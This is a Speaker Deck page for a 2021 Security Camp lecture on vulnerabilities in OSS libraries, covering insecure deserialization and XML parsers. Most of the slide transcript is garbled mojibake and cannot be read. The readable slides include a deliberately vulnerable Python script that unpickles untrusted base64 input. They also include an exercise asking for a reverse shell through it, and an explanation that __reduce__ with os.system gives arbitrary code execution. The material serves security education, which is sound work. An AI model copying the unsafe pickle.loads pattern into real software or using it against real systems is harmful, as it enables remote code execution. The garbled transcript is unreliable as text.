$30 off During Our Annual Pro Sale. View Details »

趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

@tkmru
September 19, 2021
Programming
0
3.4k

 趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

GitHubリポジトリ:
https://github.com/tkmru/seccamp2021-b5

講義紹介ページ:
https://www.ipa.go.jp/jinzai/camp/2021/zenkoku2021_program_list.html#list_b5

@tkmru

September 19, 2021
Tweet

More Decks by @tkmru

See All by @tkmru
Ipa-medit: Memory modification tool for iOS apps without Jailbreaking/ipa-medit-codeblue2022
tkmru
0
59
Ipa-medit: Memory Search and Patch Tool for IPA Without Jailbreaking @Black Hat USA 2021 Arsenal/ipa-medit-bh2021-usa
tkmru
1
3.4k
Learn the essential way of thinking about vulnerabilities through post-exploitation on middlewares (MySQL/PostgreSQL編)/seccamp2020-b8
tkmru
3
610
apk-medit: memory search and patch tool for debuggable APK @CODE BLUE 2020 Bluebox
tkmru
0
160
apk-medit: memory search and patch tool for debuggable APK @Black Hat USA 2020 Arsenal/apk-medit-bh2020-usa
tkmru
0
3.5k
めんどうくさいゲームセキュリティ
tkmru
20
10k
Linux Rootkit Internals
tkmru
1
1.5k
Unicornを用いたDead Code除去
tkmru
0
170
古典的なStack Overflow から JIT-ROPまで
tkmru
1
270

Other Decks in Programming

See All in Programming
GISとDjango GEOS APIの話
mierune
0
290
蔵書管理アプリを作り直した
tinymouse
0
130
클라우드 시대에 맞는 사이트 신뢰성 엔지니어
outsider
0
530
Elm_LandでElm入門
negiboudu
0
150
RubyWorld Conference 2022 に初めて現地参加してみて
shiorin
0
150
KubeCon + CNCon Europe 2022 Recap ~ Istio Today and Tomorrow: Sidecars and Beyond
ksudate
0
120
Import Maps: The Next Evolution Step for Micro Frontends?
manfredsteyer
PRO
0
130
はてなブログ作成から投稿までをGitHub Actionsで自動化する
myamashii
1
350
一か月半かけて、TypeScript本を写経した話
2nofa11
0
110
傾聴対話ライブラリ実装 -おうむ返し-
sadahry
0
950
Are your automated tests improving?
teyamagu
11
1.9k
Wantedlyのフロントエンド領域の取り組みと課題
chloe463
0
2.6k

Featured

See All Featured
Git: the NoSQL Database
bkeepers
PRO
417
60k
Why Our Code Smells
bkeepers
PRO
326
55k
Product Roadmaps are Hard
iamctodd
35
7.5k
Build The Right Thing And Hit Your Dates
maggiecrowley
21
1.3k
Rails Girls Zürich Keynote
gr2m
87
12k
The Illustrated Children's Guide to Kubernetes
chrisshort
22
42k
The Power of CSS Pseudo Elements
geoffreycrofte
51
4.2k
The Brand Is Dead. Long Live the Brand.
mthomps
48
2.9k
Documentation Writing (for coders)
carmenintech
49
2.8k
How GitHub Uses GitHub to Build GitHub
holman
465
280k
Building a Scalable Design System with Sketch
lauravandoore
451
30k
Designing Experiences People Love
moore
130
22k

Transcript

  1. झຯͱ࣮ӹͷͨΊͷ ஶ໊ͳ044ϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯ גࣜձࣾΞΧπΩ খ஛ɹହҰ

  2. ࣗݾ঺հ w খ஛ɹହҰ w (JU)VC5XJUUFSULNSV w ॴଐגࣜձࣾΞΧπΩ w ੬ऑੑ਍அ w

    νʔτରࡦπʔϧ։ൃͳͲ 

  3. ࣗݾ঺հ ஶॻ

  4. ηΩϡϦςΟɾΩϟϯϓͱͳ͔Α͠ʂ w ηΩϡϦςΟɾΩϟϯϓશࠃେձࢀՃ w ηΩϡϦςΟɾϛχΩϟϯϓJOژ౎νϡʔλʔ w ηΩϡϦςΟɾϛχΩϟϯϓJOਆށνϡʔλʔ w ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯߨࢣ w

    ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯߨࢣ ࣗݾ঺հ 

  5. #MBDL)BU"STFOBMͱ΋ͳ͔Α͠ʢʁʣ w #MBDL)BU64""STFOBM w "OESPJEΞϓϦ޲͚ϝϞϦվ͟ΜπʔϧʮBQLNFEJUʯΛൃද w #MBDL)BU64""STFOBM w J04ΞϓϦ޲͚ϝϞϦվ͟ΜπʔϧʮJQBNFEJUʯΛൃද w

    #MBDL)BU&VSPQF"STFOBM w 5#" ࣗݾ঺հ 

  6. ຊ೔ͷߨٛʹ͍ͭͯ  w ԋश؀ڥߏஙͷͨΊͷίϚϯυͷ৘ใ͕εϥΠυʹࡌ͍ͬͯΔͷͰίϐϖͰ ߏஙͰ͖ΔΑ͏ʹεϥΠυ͸4MBDL্Ͱ഑෍ͯ͋͠Γ·͢ w ԋशͷͱ͖͸֤ࣗͰεϥΠυ͔͞ͷ΅Γͭͭ΍ͬͯ΋Β͑Δͱ🙏 w ޙ೔ެ։൛Λ4QFBLFS%FDLͰެ։͢ΔͷͰݟֶ࿮ͷਓͨͪ͸ ଴͍ͬͯͯͩ͘͞🙇

    w (JU)VCϦϙδτϦ w IUUQTHJUIVCDPNULNSVTFDDBNQC

  7. ຊ೔ͷߨٛʹ͍ͭͯ 

  8. ຊ೔ͷߨٛʹ͍ͭͯ ӕͰ͢ʢҰ෦ʣ 

  9. ຊ೔ͷߨٛʹ͍ͭͯ w ߨٛ֓ཁΛߟ͑ͨͷ͸໿ϲ݄લʜ w ౰࣌͸9.-ύʔαʹओ࣠Λ͓͍ͨߨٛΛ͠Α͏ͱࢥ͍ͬͯͨ w ͋ͱͰߟ͑௚͢ͱগ͠είʔϓ͕ڱ͍ w ͱ͍͏͜ͱͰɺѻ͏੬ऑੑΛ૿΍͍ͯ͠·͢ʂ 

  10. ͦ΋ͦ΋੬ऑੑͱ͸ w ιϑτ΢ΣΞʹ͓͚ΔηΩϡϦςΟ্ͷ໰୊Օॴ w ιϑτ΢ΣΞͷྫϥΠϒϥϦɺ04ɺ8FCΞϓϦέʔγϣϯͳͲ w ໰୊ՕॴΛ߈ܸ͞ΕΔ͜ͱͰɺຊདྷͷػೳΛଛͳ͍ɺϢʔβ͕ෆརӹΛඃΔ w ৘ใͷ࿙ӮͳͲ w

    ˠ੬ऑੑΛ߈ܸऀΑΓૣ͘ൃݟͯ͠मਖ਼͍ͯ͘͠ඞཁ͕͋Δʂʂ 

  11. ຊ೔ͷߨٛͷྲྀΕ w ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢલ࠲ʣ w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w 9.-ύʔαʹର͢Δ߈ܸख๏ w ٕज़ͱ޲͖߹͏࢟੎ͷ࿩ʢ͍͍࿩ʣ 

  12. ୈ̍ষ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηε

  13. ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηε w اۀͰߦΘΕΔ੬ऑੑ਍அ w ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ w ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 

  14. اۀͰߦΘΕΔ੬ऑੑ਍அ w ηΩϡϦςΟΤϯδχΞ͕੬ऑੑ͕ͳ͍͔֬ೝ͢Δ͜ͱΛ੬ऑੑ਍அͱ͍͏ w αʔϏεͷϦϦʔεલ΍ɺ௥ՃͰେ͖ͳػೳΛ࣮૷ͨ͠ࡍʹߦΘΕΔ w 8FCΞϓϦέʔγϣϯ΍εϚϗΞϓϦɺ*P5ػثͳͲ͕ର৅ w ηΩϡϦςΟϕϯμʹ֎஫ɺ·ͨ͸಺੡Ͱ࣮ࢪ͞ΕΔ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̍ʣ

    

  15. اۀͰߦΘΕΔ੬ऑੑ਍அ ੬ऑੑ਍அͷ༷ࢠʢʣ w ੬ऑੑΛൃݟ͢Δʹ͸༷ʑͳ؍఺͕͋Δ͕ɺΞϓϦέʔγϣϯͱαʔόؒͷ ௨৴Λ֬ೝɾվ͟Μ͢Δ͜ͱͰൃݟͰ͖Δ੬ऑੑ͕ଟ͍ ϓϩΩγπʔϧΛ࢖ͬͯ௨৴಺༰Λ֬ೝ͢Δ ηΩϡϦςΟΤϯδχΞ αʔό ਍அର৅ 

  16. اۀͰߦΘΕΔ੬ऑੑ਍அ ੬ऑੑ਍அͷ༷ࢠʢʣ w ηΩϡϦςΟΤϯδχΞ͕ݟ͚ͭͨ੬ऑੑΛ։ൃऀʹใࠂ w ։ൃऀ͕ΞϓϦέʔγϣϯΛमਖ਼ ηΩϡϦςΟΤϯδχΞ ใࠂΛड͚ͯ੬ऑੑΛमਖ਼͢Δ։ൃऀ ηΩϡΞͳঢ়ଶͰαʔϏεΛϦϦʔε 

  17. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ w ݚڀ໨తͰ͋ͬͨΓझຯͰ͋ͬͨΓͰɺੈͷதʹެ։͞Ε͍ͯΔιϑτ΢Σ Ξͷ੬ऑੑΛউखʹݟ͚ͭΔਓ͕͍ͨͪΔ w ൃݟͨ͠੬ऑੑ͕ެ։͞ΕΔͱݟ͚ͭͨਓͷ੒ՌͱͳΔͷͰ͏Ε͍͠ w ͓ۚ💰͕΋Β͑Δ੍౓΋͋Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̎ʣ 

  18. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ใࠂऀʹใ঑ۚΛ౉͢όάό΢ϯςΟ w ࣗࣾͷ੡඼ͷ੬ऑੑΛใࠂͯ͘͠Εͨਓʹ੬ऑੑͷӨڹ౓ʹ४ͯ͡ใ঑ۚΛ ౉੍͢౓ w ੬ऑੑΛѱ༻͞ΕΔΑΓɺใ঑ۚΛ͔͚ͯͰ΋ใࠂͯ͠΋Βͬͨ΄͏͕͍͍ w ੬ऑੑ਍அͱҧͬͯຊ൪؀ڥʹ߈ܸߦҝ͕ߦΘΕΔ w

    اۀ͕ηΩϡϦςΟରࡦʹ஫ྗ͍ͯ͠Δ͜ͱͷ13ʹ΋ͭͳ͕Δ 

  19. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ஶ໊όάό΢ϯςΟαʔϏε w )BDLFS0OF w 4UBSCVDLTɺ/JOUFOEPɺ-*/&ɺ50:05"ͳͲ w CVHDSPXE w *OEFFEɺ/FUqJYɺ5FTMBɺ.BTUFSDBSEͳͲ

    w #VH#VOUZKQ w $IBUXPSLɺCJUCBOLͳͲ 

  20. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ *1"΁ͷใࠂ w όάό΢ϯςΟΛ΍͍ͬͯͳ͍αʔϏε΍ɺ044ͷιϑτ΢ΣΞͷ੬ऑੑΛ ݟ͚ͭͯ͠·͏ʢݟ͚͍ͭͨʢʁʣʣ͜ͱ΋͋Δ w ͦΜͳͱ͖͸*1"ʹใࠂ͢Δͱ։ൃऀ΁ͷ࿈བྷΛߦͬͯ͘ΕΔ w ੬ऑੑؔ࿈৘ใͷಧग़ड෇ ʢIUUQTXXXJQBHPKQTFDVSJUZWVMOSFQPSUʣ

    w ։ൃऀͱ௚઀΍ΓऔΓ͢ΔͱᎍΊΔՄೳੑ͕͋Δ 

  21. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ *1"΁ͷใࠂ IUUQTJTFDWVMGPSNJQBHPKQJQBWVMNBJOJOEFYIUNM

  22. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ใࠂͨ͠੬ऑੑʹ$7&͕ͭ͘͜ͱ΋ w $7&ʢ$PNNPO7VMOFSBCJMJUJFTBOE&YQPTVSFTʣɿڞ௨੬ऑੑࣝผࢠ w .*53&͕ࣾ৘ใڞ༗ͷͨΊʹ֤੬ऑੑʹݻ༗ͷ$7&*%ΛׂΓৼ͍ͬͯΔ w ੲɺ֤छ੡඼ϕϯμʔ΍ηΩϡϦςΟϕϯμʔ͕ɺ੬ऑੑʹରͯ͠ಠࣗʹ ໊લΛ෇͚͍ͯͨ w

    ೥ʹ$7&͕ొ৔͠ɺ੬ऑੑ৘ใͷൺֱΛ༰қʹߦ͑ΔΑ͏ʹͳͬͨ w ݟ͚ͭͨ੬ऑੑʹ$7&͕ͭ͘ͱࣗຫͰ͖Δ 

  23. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ੬ऑੑʹ$7&͕ͭ͘·ͰͷྲྀΕ w ೔ຊͰ͸*1"ͱ+1$&35$$͕.*53&ࣾͱ࿈ܞͯ͠ݟ͔ͭͬͨ੬ऑੑʹରͯ͠ $7&Λ࠾൪͢ΔऔΓ૊ΈΛߦ͍ͬͯΔ 

  24. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ͜͜·Ͱݟ͖ͯͨͱ͓Γɺ੬ऑੑ͸೔ʑൃݟ͞Ε͍ͯΔ w ੬ऑੑͷ͋Διϑτ΢ΣΞΛ༻͍͍ͯΔ͚ͩͰ੬ऑੑͱͳΓ͏Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ  IUUQTXXXJQBHPKQTFDVSJUZWVMOSFQPSUWVMORIUNM

  25. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ਵ࣌ൃݟ͞ΕΔϥΠϒϥϦ΍04౳ͷ੬ऑੑʹ͸ϦϦʔεલʹ࣮ࢪ͢Δ ੬ऑੑ਍அͰ͸ରԠͰ͖ͳ͍ w ӡ༻޻ఔͰ੬ऑੑͷରԠΛ͢Δඞཁ͕͋Δ w ੬ऑੑͷରࡦํ๏͕ެ։͞ΕΔલʹɺ߈ܸ͕ߦΘΕΔ͜ͱ΋͋ΔʢθϩσΠ ߈ܸʣ w

    Өڹ౓͕ߴ͍੬ऑੑ͕ެ։͞Εͨ৔߹͸ਝ଎ʹରԠ͢Δඞཁ͕͋Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ 

  26. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ӡ༻࣌ʹ੬ऑੑͷ͋Διϑτ΢ΣΞ͕͋Ε͹Ξοϓσʔτ͍͖͍ͯͨ͠ w ˠαʔό಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ7VMT w ˠίϯςφ಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ5SJWZ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ 

  27. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ αʔό಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ7VMT w 7VMTʢ76-OFSBCJMJUZ4DBOOFSʣ w IUUQTHJUIVCDPNGVUVSFBSDIJUFDUWVMT w ϑϡʔνϟʔגࣜձ͕ࣾ։ൃ͍ͯ͠Δ044ͷ੬ऑੑεΩϟφ w αʔό಺Ͱ༻͍͍ͯΔιϑτ΢ΣΞʹ੬ऑੑΛؚΉόʔδϣϯͷ΋ͷ͕ͳ͍͔

    ֬ೝ 

  28. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 7VMTͷ࢓૊Έ IUUQTHJUIVCDPNGVUVSFBSDIJUFDUWVMT 

  29. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ίϯςφ಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ5SJWZ w "RVB4FDVSJUZ͕։ൃ͍ͯ͠Δ044ͷ੬ऑੑεΩϟφ w IUUQTHJUIVCDPNBRVBTFDVSJUZUSJWZ w %PDLFSΠϝʔδΛεΩϟϯͰ͖Δ w ϝϯς͞Ε͍ͯͳ͍ެࣜ%PDLFSΠϝʔδ΋ଟ͍

    w "4JNQMFBOE$PNQSFIFOTJWF7VMOFSBCJMJUZ4DBOOFSGPS$POUBJOFST  4VJUBCMFGPS$* w $*ʹ૊ΈࠐΉ͜ͱ΋Ͱ͖ͯศར 

  30. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ Ϋϥ΢υ؀ڥͷઃఆ΋νΣοΫ͍ͨ͠ w "84΍($1ͷઃఆϛεʹΑΔ੬ऑੑ΋͋Δ w ೔ʑɺΠϯϑϥͷઃఆ͸มΘ͍ͬͯ͘ͷͰɺϦϦʔεલͷ੬ऑੑ਍அͰ͸ ๷͛ͳ͍ w ੬ऑͳ෦෼Λ߈ܸऀ͸CPUΛ༻͍ͯߴ଎ʹ୳ͯ͘͠Δ 

  31. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 4όέοτ͸Α͘ૂΘΕ͍ͯΔ w Α͘ૂΘΕ͍ͯΔ"84ͷ࢓૊Έͷͻͱͭʹ4όέοτ͕͋Δ w ਖ਼໊ࣜশ"NB[PO4 "NB[PO4JNQMF4UPSBHF4FSWJDF  w Πϯλʔωοτܦ༝Ͱར༻Ͱ͖ΔετϨʔδαʔϏε

    w 4όέοτσʔλͷஔ͖৔ॴ w ੩తϑΝΠϧϗεςΟϯά͕Ͱ͖8FCαʔόͱͯ͠΋࢖༻Ͱ͖Δ w ༷ʑͳσʔλ͕ஔ͔ΕΔͷͰɺσʔλ͕ཉ͍͠߈ܸऀʹૂΘΕΔ 

  32. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ࡢࠓͷΠϯγσϯτࣄྫ w 4όέοτઃఆϛεʹΑΔԯສੈଳҎ্ͷݸਓ৘ใ࿙Ӯ w ΧϦϑΥϧχΞΛڌ఺ͱ͢Δσʔλ෼ੳձࣾͰ͋Δ"MUFSZY͔ࣾΒͷ࿙Ӯ w IUUQTXXXUSFOENJDSPDPNWJOGPQMTFDVSJUZOFXTWJSUVBMJ[BUJPOBOEDMPVEEBUBPONJMMJPOVT IPVTFIPMETFYQPTFEEVFUPNJTDPOpHVSFEBXTTCVDLFU w

    ެ։4όέοτΛɺϚϧ΢ΣΞΛ࢓ࠐΜͩঢ়ଶͰ্ॻ͖͢Δ߈ܸऀ w ޡͬͯॻ͖ࠐΈΛڐՄ͞Ε͍ͯΔόέοτʹϚϧ΢ΣΞΛॻ͖ࠐΈ w IUUQTXXXNDBGFFDPNCMPHTFOUFSQSJTFDMPVETFDVSJUZNDBGFFEJTDPWFSTHIPTUXSJUFSBQFSWBTJWFBXTT NBOJOUIFNJEEMFFYQPTVSF 

  33. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ "84$POpH w "84ͷ֤छઃఆ͕ϧʔϧͲ͓Γʹઃఆ͞Ε͍ͯΔ͔ධՁ͢ΔαʔϏε w ެ։͞Ε͍ͯΔηΩϡϦςΟάϧʔϓ͕ଘࡏ͠ͳ͍͔ʁ w 4όέοτ͕ެ։ઃఆʹͳ͍ͬͯͳ͍͔ʁ w ެ։͞Ε͍ͯΔ&#43%4εφοϓγϣοτ͕ଘࡏ͠ͳ͍͔ʁ

    

  34. ͲͷΑ͏ͳ੬ऑੑ͕ݟ͔ͭΔͷ͔

  35. 08"415PQ 08"41ͱ͸ w 08"41ʢ0QFO8FC"QQMJDBUJPO4FDVSJUZ1SPKFDUʣ͸ηΩϡϦςΟͷ ܒ໤ͱීٴΛ໨తͱͨ͠/10ஂମ w ੈքதʹڌ఺͕͋Δ w ೔ຊʹ΋͋ͬͯυΩϡϝϯτΛެ։ͨ͠ΓษڧձΛओ࠵ͨ͠Γ͍ͯ͠Δ w

    IUUQTPXBTQPSHXXXDIBQUFSKBQBO w 08"415PQ͸8FCΞϓϦέʔγϣϯʹ͓͍ͯ Α͘ݟ͔ͭΔ੬ऑੑϥϯΩϯά 

  36. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΠϯδΣΫγϣϯ߈ܸ w ೝূͷෆඋ w ػඍͳ৘ใͷ࿐ग़ w 99&

    w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳηΩϡϦςΟઃఆ w 944 w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτ ͷ࢖༻ w ෆे෼ͳϩΪϯάͱϞχλϦϯά 

  37. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ  IUUQTHJUIVCDPN08"415PQCMPCNBTUFSEPDT"@@*OUSPEVDUJPONE

  38. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳ҉߸Խ w ΠϯδΣΫγϣϯ w ҆શͰͳ͍ઃܭ

    w ෆద੾ͳηΩϡϦςΟઃఆ w ੬ऑͳݹ͍ίϯϙʔωϯτ w ෆద੾ͳ*EFOUJpDBUJPOͱ "VUIFOUJDBUJPO w ιϑτ΢ΣΞͱσʔλͷ੔߹ͷෆඋ w ηΩϡϦςΟϩάͱϞχλϦϯάͷෆ උ w αʔόʔαΠυϦΫΤετϑΥʔδΣϦ ʢ443'ʣ 

  39. ߨٛͰѻ͏੬ऑੑ w ୊झຯͱ࣮ӹͷͨΊͷஶ໊ͳ044ϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ w 044ϥΠϒϥϦىҼͱ͍ͬͯ΋෯޿͍ʜ w ֤ϓϩάϥϛϯάݴޠʹσϑΥϧτͰଘࡏ͢ΔϥΠϒϥϦىҼͷ੬ऑੑʹয ఺Λ౰ͯΔˠ࡞Γࠐ·Ε΍͍͢ʂʂ w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ

    w 9.-ύʔαؔ࿈ 

  40. 08"415PQ 08"41ʹΑΔ΍ΒΕ؀ڥ w 08"41͸੬ऑੑΛ࡞Γࠐ·Εͨԋश༻ͷΞϓϦͷެ։΋͍ͯ͠Δ w +VJDF4IPQʢIUUQTHJUIVCDPNCLJNNJOJDIKVJDFTIPQʣ w 3BJMT(PBUʢIUUQTHJUIVCDPN08"41SBJMTHPBUʣ w %74"ʢIUUQTHJUIVCDPN08"41%74"ʣ

    w ͳͲ w ษڧʹͳΔͷͰ΍ͬͯΈ͍ͯͩ͘͞ʂ 

  41. ୈ̎ষ ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ

  42. γϦΞϥΠζͱσγϦΞϥΠζ γϦΞϥΠζͱ͸ w γϦΞϥΠζ ഑ྻ΍ΫϥεͳͲͷΦϒδΣΫτΛόΠτྻܗࣜͷσʔλ΁มߋ͢Δ͜ͱ w σγϦΞϥΠζʢΞϯγϦΞϥΠζʣ γϦΞϥΠζ͞ΕΔ͜ͱʹΑͬͯੜ੒͞ΕͨόΠτྻܗࣜͷσʔλΛ ΦϒδΣΫτ΁໭͢͜ͱ w

    ༻్ ෳࡶͳσʔλ΍ΦϒδΣΫτͳͲͷεφοϓγϣοτΛऔΔ ϑΝΠϧ΍%#ʹอଘ͢Δࡍ΍ɺωοτϫʔΫΛ௨ͯ͡ૹ৴͢ΔͳͲ 

  43. 1ZUIPOͰͷγϦΞϥΠζσγϦΞϥΠζ w QJDLMFϞδϡʔϧͷQJDLMFEVNQT ɺQJDLMFMPBET ͳͲͰ γϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ  { 'name':

    'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ', 'year': 2021, 'place': ‘online' } b'\x80\x04\x95k\x00\x00\x00\x00\x00\x00\x00}\x94( \x8c\x04name\x94\x8cA\xe3\x82\xbb\xe3\x82\xad\xe3 \x83\xa5\xe3\x83\xaa\xe3\x83\x86\xe3\x82\xa3\xe3\ x83\xbb\xe3\x82\xad\xe3\x83\xa3\xe3\x83\xb3\xe3\x 83\x97\xe5\x85\xa8\xe5\x9b\xbd\xe5\xa4\xa7\xe4\xb c\x9a2021 \xe3\x82\xaa\xe3\x83\xb3\xe3\x83\xa9\xe3\x82\xa4\ xe3\x83\xb3\x94\x8c\x04year\x94M\xe5\x07\x8c\x05p lace\x94\x8c\x06online\x94u.’

  44. 1)1ͰͷγϦΞϥΠζσγϦΞϥΠζ w ඪ४ؔ਺ͷTFSJBMJ[F ͱVOTFSJBMJ[F ͰγϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ  array( 'name'=>'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ’,

    'year'=>2021, 'place'=>'online' ) a:3:{s:4:"name";s:65:"ηΩϡϦςΟɾΩϟϯϓશࠃେձ 2021 ΦϯϥΠ ϯ”;s:4:”year";i:2021;s:5:"place";s:6:"online";}

  45. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ Ϣʔβ͔Βͷೖྗ஋͸ཁ஫ҙ w Ϣʔβ͔Βͷೖྗ஋Λͦͷ··σγϦΞϥΠζ͍ͯ͠Δͱɺ ੜ੒͞ΕΔΦϒδΣΫτΛϢʔβ͕ίϯτϩʔϧͰ͖ͯ͠·͏  ࡉ޻͞ΕͨσʔλΛૹ৴ ߈ܸऀ͕ࢦఆͨ͠ ΦϒδΣΫτ͕ੜ੒͞ΕΔ

  46. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ϚδοΫϝιουΛ࢖͏ w ϚδοΫϝιουಛఆͷΠϕϯτ࣌ʹ҉໧తʹ࣮ߦ͞ΕΔϝιου w ϓϩάϥϛϯάݴޠ಺෦Ͱ࣮ߦ͞Ε͍ͯΔ w ֤ݴޠʹΑͬͯҟͳΔ w ΦϒδΣΫτ͕ੜ੒͞ΕΔࡍʹݺͼग़͞ΕΔϚδοΫϝιουΛ߈ܸʹར༻Մೳ

    w ΦϒδΣΫτ͕ੜ੒͞ΕΔࡍʹ࣮ߦ͢ΔίʔυΛࢦఆͰ͖Δ w ˠϢʔβ͕೚ҙίʔυΛ࣮ߦՄೳʂ 

  47. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ 1ZUIPOެࣜυΩϡϝϯτ  IUUQTEPDTQZUIPOPSHKBMJCSBSZQJDLMFIUNM

  48. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ 1)1ެࣜυΩϡϝϯτ  IUUQTXXXQIQOFUNBOVBMKBGVODUJPOVOTFSJBMJ[FQIQ

  49. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ۩ମతͳ߈ܸํ๏ʢ1ZUIPOͷ৔߹ʣ w 1ZUIPOͰγϦΞϥΠζσγϦΞϥΠζ͸QJDLMFԽVOQJDLMFԽͱݺ͹Ε͍ͯΔ w QJDLMFEVNQT Λ࢖ͬͯΦϒδΣΫτΛQJDLMFԽ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ͠@@SFEVDF@@ ϝιου͕஌ΒΕ͍ͯΔ

    w ݺͼग़͠ՄೳͳΦϒδΣΫτͱҾ਺Λλϓϧͱͯ͠ࢦఆ͢Δͱ࣮ߦͯ͘͠ΕΔ w ˠ@@SFEVDF@@ ϝιουͰPTTZTUFN Λ࣮ߦ͢ΔΦϒδΣΫτΛQJDLMFԽͯ͠ ૹ৴͢Δ͜ͱͰ೚ҙίʔυ࣮ߦʹ࣋ͪࠐΊΔʂ 

  50. ࣄલ՝୊݉બߟ՝୊& w 1ZUIPOʹ͸QJDLMFͱ͍͏ඪ४Ϟδϡʔϧ͕͋Γ·͢ɻQJDLMFͷެࣜυΩϡϝϯτʹهࡌ͞ Ε͍ͯΔΑ͏ʹɺQJDLMFͰ৴པͰ͖ͳ͍஋ΛσγϦΞϥΠζ͢Δ͜ͱ͸੬ऑੑͷݪҼͱͳ Γಘ·͢ɻͦͷཧ༝͓Αͼ߈ܸख๏ʹ͍ͭͯɺҎԼͷখ໰   ʹճ౴͍ͯͩ͘͠͞ɻ w খ໰

      Կނɺ੬ऑੑͱͳΔͷ͔Λઆ໌͍ͯͩ͘͠͞ʢඞਢճ౴ʣ w খ໰   ҎԼͷ1ZUIPOͷιʔείʔυʹ͸্هͷ੬ऑੑ͕ଘࡏ͠·͢ɻ ͜ͷ੬ऑੑΛ༻͍ͯɺ5$1ͷ൪ϙʔτʹର͢ΔϦόʔεγΣϧΛ࡞੒͍ͯͩ͘͠͞ɻ OFUDBUͰ൪ϙʔτΛ଴ͪड͚͓͖ͯɺ઀ଓཱ͕֬ͨ͠ޙɺMTͳͲͷίϚϯυΛଧͪࠐ Έ݁Ռ͕ฦͬͯ͘Ε͹ਖ਼ղͰ͢ɻʢҰ෦লུʣʢඞਢճ౴ʣ  ໰୊จ

  51. બߟ՝୊&  #!/usr/bin/env python3 # coding: UTF-8 import sys import

    base64 import pickle args = sys.argv if len(args) != 2: print('ୈҰҾ਺ʹBase64Τϯίʔυ͞ΕͨจࣈྻΛࢦఆ͍ͯͩ͘͠͞') try: data = base64.urlsafe_b64decode(args[1]) deserialized = pickle.loads(data) print('deserialized: {0}'.format(deserialized)) except: print('Failed to deserialize') ໰୊ίʔυ

  52.  બߟ՝୊&ղઆ w λʔήοτͷ୺຤͔Β߈ܸऀ͕଴ͪड͚͍ͯΔ୺຤΁ͱ઀ଓ͠ʹ͍͘͜ͱ Ͱɺ߈ܸऀ͕λʔήοτͷ୺຤্Ͱಈ࡞͢ΔγΣϧΛૢ࡞Ͱ͖ΔΑ͏ʹ͢Δ ςΫχοΫΛϦόʔεγΣϧͱݺͿ ϦόʔεγΣϧͱ͸ ԿΒ͔ͷํ๏ͰϦόʔεγΣϧΛߦ͏ίʔυΛ࣮ߦͤ͞Δ ߈ܸऀ͕଴ͪड͚Δ୺຤ʹ઀ଓ ೚ҙίʔυΛ࣮ߦ

